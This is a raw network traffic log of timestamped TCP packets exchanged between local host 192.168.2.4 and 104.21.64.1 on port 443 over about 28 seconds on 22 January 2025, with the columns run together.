                            Jan 22, 2025 08:36:00.556746006 CET49788443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:00.557059050 CET49788443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:00.557069063 CET44349788104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:00.602255106 CET44349782104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:00.602369070 CET49782443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:00.602384090 CET44349782104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:00.602404118 CET44349782104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:00.602440119 CET49782443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:00.602472067 CET49782443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:00.602652073 CET49782443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:00.602663040 CET44349782104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:01.015045881 CET44349788104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:01.015141010 CET49788443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:01.015711069 CET49788443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:01.015722036 CET44349788104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:01.015947104 CET49788443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:01.015953064 CET44349788104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:01.350266933 CET44349788104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:01.350428104 CET44349788104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:01.350431919 CET49788443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:01.350506067 CET49788443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:01.350663900 CET49788443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:01.350717068 CET44349788104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:01.350744963 CET49788443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:01.350786924 CET49788443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:02.591094971 CET49799443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:02.591191053 CET44349799104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:02.591336966 CET49799443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:02.591671944 CET49799443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:02.591711998 CET44349799104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:03.054887056 CET44349799104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:03.054951906 CET49799443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:03.055685997 CET49799443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:03.055713892 CET44349799104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:03.055911064 CET49799443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:03.055922985 CET44349799104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:03.381550074 CET44349799104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:03.381642103 CET49799443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:03.381705046 CET44349799104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:03.381747007 CET44349799104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:03.381813049 CET49799443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:03.381954908 CET49799443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:03.382004976 CET44349799104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:05.165678024 CET49819443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:05.165771008 CET44349819104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:05.165887117 CET49819443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:05.166227102 CET49819443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:05.166310072 CET44349819104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:05.641629934 CET44349819104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:05.641763926 CET49819443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:05.642266035 CET49819443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:05.642294884 CET44349819104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:05.642488956 CET49819443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:05.642501116 CET44349819104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:05.968703032 CET44349819104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:05.968863964 CET44349819104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:05.968982935 CET49819443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:05.968983889 CET49819443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:05.971988916 CET49819443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:05.972028017 CET44349819104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:06.384241104 CET49826443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:06.384329081 CET44349826104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:06.384418011 CET49826443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:06.384815931 CET49826443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:06.384845018 CET44349826104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:06.845674038 CET44349826104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:06.845750093 CET49826443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:06.846323967 CET49826443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:06.846339941 CET44349826104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:06.846581936 CET49826443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:06.846592903 CET44349826104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:07.166193008 CET44349826104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:07.166337013 CET49826443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:07.166366100 CET44349826104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:07.166390896 CET44349826104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:07.166420937 CET49826443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:07.166444063 CET49826443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:07.166583061 CET49826443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:07.166596889 CET44349826104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:07.166636944 CET49826443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:07.166636944 CET49826443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:07.571942091 CET49837443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:07.571990013 CET44349837104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:07.572072029 CET49837443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:07.572333097 CET49837443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:07.572350979 CET44349837104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:08.052743912 CET44349837104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:08.054364920 CET49837443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:08.054928064 CET49837443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:08.054941893 CET44349837104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:08.055130005 CET49837443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:08.055135965 CET44349837104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:08.372323990 CET44349837104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:08.372385979 CET49837443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:08.372387886 CET44349837104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:08.372428894 CET49837443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:08.372665882 CET49837443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:08.372688055 CET44349837104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:09.822161913 CET49850443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:09.822211027 CET44349850104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:09.822307110 CET49850443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:09.822571993 CET49850443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:09.822602034 CET44349850104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:10.292000055 CET44349850104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:10.292211056 CET49850443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:10.292666912 CET49850443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:10.292685986 CET44349850104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:10.292896032 CET49850443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:10.292908907 CET44349850104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:10.621062040 CET44349850104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:10.621118069 CET44349850104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:10.621149063 CET49850443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:10.621334076 CET49850443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:10.621426105 CET49850443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:10.621449947 CET44349850104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:11.916639090 CET49864443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:11.916738987 CET44349864104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:11.916836977 CET49864443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:11.917081118 CET49864443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:11.917112112 CET44349864104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:12.184513092 CET49865443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:12.184572935 CET44349865104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:12.184628963 CET49865443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:12.189085007 CET49865443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:12.189126015 CET44349865104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:12.396678925 CET44349864104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:12.396970034 CET49864443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:12.397315025 CET49864443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:12.397341013 CET44349864104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:12.397510052 CET49864443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:12.397522926 CET44349864104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:12.666466951 CET44349865104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:12.666553020 CET49865443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:12.667162895 CET49865443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:12.667190075 CET44349865104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:12.667345047 CET49865443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:12.667356968 CET44349865104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:12.733320951 CET44349864104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:12.733468056 CET44349864104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:12.733494043 CET49864443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:12.733546972 CET49864443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:12.733727932 CET49864443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:12.733761072 CET44349864104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:13.012691021 CET44349865104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:13.012850046 CET44349865104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:13.012892008 CET49865443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:13.012947083 CET49865443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:13.012988091 CET49865443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:13.012988091 CET49865443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:13.013027906 CET44349865104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:13.013087034 CET49865443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:13.899959087 CET49881443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:13.900046110 CET44349881104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:13.900291920 CET49881443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:13.900403976 CET49881443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:13.900439024 CET44349881104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:14.362876892 CET44349881104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:14.362967968 CET49881443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:14.363497019 CET49881443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:14.363509893 CET44349881104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:14.363713980 CET49881443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:14.363719940 CET44349881104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:14.676532030 CET44349881104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:14.676676989 CET44349881104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:14.676837921 CET49881443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:14.676837921 CET49881443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:14.677053928 CET49881443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:14.677084923 CET44349881104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:15.728455067 CET49892443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:15.728502035 CET44349892104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:15.728583097 CET49892443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:15.728931904 CET49892443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:15.728955984 CET44349892104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:16.206898928 CET44349892104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:16.206970930 CET49892443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:16.207425117 CET49892443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:16.207444906 CET44349892104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:16.207707882 CET49892443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:16.207717896 CET44349892104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:16.541645050 CET44349892104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:16.541728020 CET49892443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:16.541745901 CET44349892104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:16.541798115 CET49892443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:16.542093039 CET49892443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:16.542120934 CET44349892104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:17.494195938 CET49903443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:17.494292974 CET44349903104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:17.494503975 CET49903443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:17.494785070 CET49903443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:17.494821072 CET44349903104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:17.953722000 CET44349903104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:17.953783035 CET49903443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:17.954292059 CET49903443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:17.954302073 CET44349903104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:17.954552889 CET49903443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:17.954571962 CET44349903104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:18.040827036 CET49909443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:18.040863991 CET44349909104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:18.040919065 CET49909443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:18.041219950 CET49909443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:18.041229963 CET44349909104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:18.287241936 CET44349903104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:18.287367105 CET49903443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:18.287426949 CET44349903104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:18.287467003 CET44349903104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:18.287502050 CET49903443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:18.287529945 CET49903443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:18.287758112 CET49903443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:18.287786961 CET44349903104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:18.493917942 CET44349909104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:18.493985891 CET49909443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:18.494353056 CET49909443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:18.494359016 CET44349909104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:18.494571924 CET49909443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:18.494576931 CET44349909104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:18.816576004 CET44349909104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:18.816731930 CET44349909104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:18.816768885 CET49909443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:18.816793919 CET49909443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:18.817013979 CET49909443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:18.817028046 CET44349909104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:18.817053080 CET49909443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:18.817075014 CET49909443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:19.149832964 CET49916443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:19.149858952 CET44349916104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:19.149930000 CET49916443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:19.150145054 CET49916443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:19.150156021 CET44349916104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:19.609944105 CET44349916104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:19.610040903 CET49916443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:19.610724926 CET49916443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:19.610735893 CET44349916104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:19.610934019 CET49916443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:19.610937119 CET44349916104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:19.945120096 CET44349916104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:19.945178986 CET49916443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:19.945188046 CET44349916104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:19.945223093 CET49916443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:19.945266008 CET44349916104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:19.945307016 CET49916443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:19.945499897 CET49916443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:19.945509911 CET44349916104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:20.712702990 CET49926443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:20.712814093 CET44349926104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:20.712908030 CET49926443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:20.713192940 CET49926443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:20.713223934 CET44349926104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:21.248580933 CET44349926104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:21.248660088 CET49926443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:21.249353886 CET49926443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:21.249372005 CET44349926104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:21.249811888 CET49926443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:21.249823093 CET44349926104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:21.562572956 CET44349926104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:21.562755108 CET44349926104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:21.562850952 CET49926443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:21.587685108 CET49926443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:21.587728024 CET44349926104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:22.291081905 CET49937443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:22.291174889 CET44349937104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:22.291254044 CET49937443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:22.291692019 CET49937443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:22.291775942 CET44349937104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:22.770396948 CET44349937104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:22.771949053 CET49937443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:22.772423029 CET49937443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:22.772476912 CET44349937104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:22.772542953 CET49937443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:22.772556067 CET44349937104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:23.088516951 CET44349937104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:23.088680029 CET44349937104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:23.088783979 CET49937443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:23.089138031 CET49937443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:23.089204073 CET44349937104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:23.712655067 CET49948443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:23.712754965 CET44349948104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:23.713097095 CET49948443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:23.713202000 CET49948443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:23.713231087 CET44349948104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:23.853136063 CET49949443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:23.853234053 CET44349949104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:23.853352070 CET49949443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:23.853624105 CET49949443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:23.853652000 CET44349949104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:24.173434019 CET44349948104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:24.174962997 CET49948443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:24.223439932 CET49948443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:24.223468065 CET44349948104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:24.223977089 CET49948443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:24.224004984 CET44349948104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:24.325098991 CET44349949104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:24.326951981 CET49949443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:24.334254026 CET49949443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:24.334270954 CET44349949104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:24.334458113 CET49949443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:24.334467888 CET44349949104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:24.521492958 CET44349948104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:24.521584034 CET44349948104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:24.521584988 CET49948443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:24.521661043 CET49948443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:24.524394035 CET49948443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:24.524418116 CET44349948104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:24.666985989 CET44349949104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:24.667063951 CET49949443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:24.667098045 CET44349949104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:24.667151928 CET49949443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:24.667172909 CET44349949104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:24.667206049 CET44349949104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:24.667206049 CET49949443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:24.667206049 CET49949443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:24.667229891 CET49949443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:24.667233944 CET44349949104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:24.667254925 CET49949443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:24.667277098 CET49949443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:25.087445974 CET49958443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:25.087490082 CET44349958104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:25.087682009 CET49958443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:25.087785006 CET49958443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:25.087802887 CET44349958104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:25.571358919 CET44349958104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:25.575957060 CET49958443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:25.602083921 CET49958443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:25.602117062 CET44349958104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:25.602758884 CET49958443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:25.602771044 CET44349958104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:25.902514935 CET44349958104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:25.902607918 CET44349958104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:25.902709961 CET49958443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:25.902987003 CET49958443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:25.903000116 CET44349958104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:26.416104078 CET49966443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:26.416197062 CET44349966104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:26.416311979 CET49966443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:26.416739941 CET49966443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:26.416824102 CET44349966104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:26.899811983 CET44349966104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:26.900094032 CET49966443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:26.900521994 CET49966443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:26.900578022 CET44349966104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:26.900641918 CET49966443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:26.900660038 CET44349966104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:27.229502916 CET44349966104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:27.229576111 CET44349966104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:27.229690075 CET49966443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:27.229865074 CET49966443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:27.229887009 CET44349966104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:27.681405067 CET49977443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:27.681463003 CET44349977104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:27.681555033 CET49977443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:27.681818962 CET49977443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:27.681844950 CET44349977104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:28.137973070 CET44349977104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:28.138031960 CET49977443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:28.138396978 CET49977443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:28.138403893 CET44349977104.21.64.1192.168.2.4
                            Jan 22, 2025 08:36:28.138592005 CET49977443192.168.2.4104.21.64.1
                            Jan 22, 2025 08:36:28.138600111 CET44349977104.21.64.1192.168.2.4
